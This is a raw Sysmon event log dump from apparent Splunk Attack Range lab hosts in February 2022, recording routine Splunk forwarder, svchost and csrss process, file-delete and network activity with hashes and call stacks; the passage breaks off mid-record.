23542300x8000000000000000284379Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:00.210{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6CC858A7D8E0852740AEC48263E2578,SHA256=67B59EA3130E3FCE6172E40B845B5C4F97B156C14C4D742189F453C85B0E8DB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213589Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:00.129{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA78F6A36EFD3E201206A6593A7CB12E,SHA256=801515DD1ED06E0943A249FD27ABBF017BCD1B1F3795BEFBE38DF5AE236DFA9A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213591Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:32:58.659{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51130-false10.0.1.12-8000- 23542300x8000000000000000213590Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:01.145{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A916A255B220CC6992CD9C8830B9F115,SHA256=8B000BBDEC9428A68492C2813B572FD74CD24AB895CFA510C6FE3A7A8AEEA62B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284380Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:01.225{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F85DF96A4D5CF8E53EA4595225F17A5,SHA256=FB85E944B763E586396027D847EC15B777A1B970157BAF6D10FFC90BCFBACF3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213592Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:02.379{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=828DF729EB3487C482B5CDE371FA85AE,SHA256=1B5DDCDFF5BCE862D266B3CA2861B388EE6E6C0A48E789F44EF27E1247F2FB3E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284398Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:02.804{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0D5E-6216-8804-000000003802}3692C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284397Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:02.804{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284396Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:02.804{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284395Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:02.804{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284394Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:02.804{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284393Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:02.804{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-0D5E-6216-8804-000000003802}3692C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000284392Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:02.804{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0D5E-6216-8804-000000003802}3692C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000284391Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:02.805{C8EA50B7-0D5E-6216-8804-000000003802}3692C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000284390Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:02.272{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B40D46DAF436CF912A40B96E2C258A8,SHA256=27A97B146C7407BCAE80EE3F71D0F27951E48F6EF4A7B0B0F1497376CC9BDB1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284389Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:02.257{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4C9374267C661A4FC3924AAF22AFE1F,SHA256=897050DF5506115047AC90B2C94CF95621DD7EC9892CE962A61FED8315AF5872,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284388Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:02.194{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0D5E-6216-8704-000000003802}5596C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284387Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:02.190{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284386Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:02.189{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284385Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:02.189{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284384Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:02.189{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-0D5E-6216-8704-000000003802}5596C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000284383Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:02.189{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284382Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:02.189{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0D5E-6216-8704-000000003802}5596C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000284381Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:02.188{C8EA50B7-0D5E-6216-8704-000000003802}5596C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000213593Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:03.395{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A70A25D41F7A3727D703EF902F8F8C35,SHA256=E9AB6CDCF931BCCC5E80B60D4E9D4D58876A5C93601EA818AFD4C8A35EC03A03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284402Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:03.267{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98E6DCE18721CD585C58DB0E5AF44835,SHA256=FB310E87F02158F75F16B237F3E3588626D235A74C496F9755C61B775F455EA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284401Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:03.199{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=877169D7318C972019E80A55CBA4FC2E,SHA256=CCFE473A09F8F92068B2A7CF13DA14D5B55F6228BED8CCC4AE8A8362B55312C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284400Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:03.199{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB7787397C9E3AB345CF5868ECDB908E,SHA256=CBB6C2D7D0988B455EEEADACD2DD18E7AAD59BDE8959B393E6436B77D817358F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284399Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:03.102{C8EA50B7-0D5E-6216-8804-000000003802}36924884C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000213594Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:04.410{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFB160DC28FAC6A6D4FC4501EE8460E6,SHA256=9FB4521255807DF072D3F79F013E1B90CC44E1716EF7EB26F28CDEDAFA857AF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284412Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:04.603{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=877169D7318C972019E80A55CBA4FC2E,SHA256=CCFE473A09F8F92068B2A7CF13DA14D5B55F6228BED8CCC4AE8A8362B55312C2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284411Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:04.267{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0D60-6216-8904-000000003802}5188C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000284410Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:04.267{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72899BA97A74C29D4CBD9ABF8F76C879,SHA256=FB5EB529052774D8CB3ECEE504C436E4D5B78853958C77531CE383C4F9E9EE38,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284409Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:04.267{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284408Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 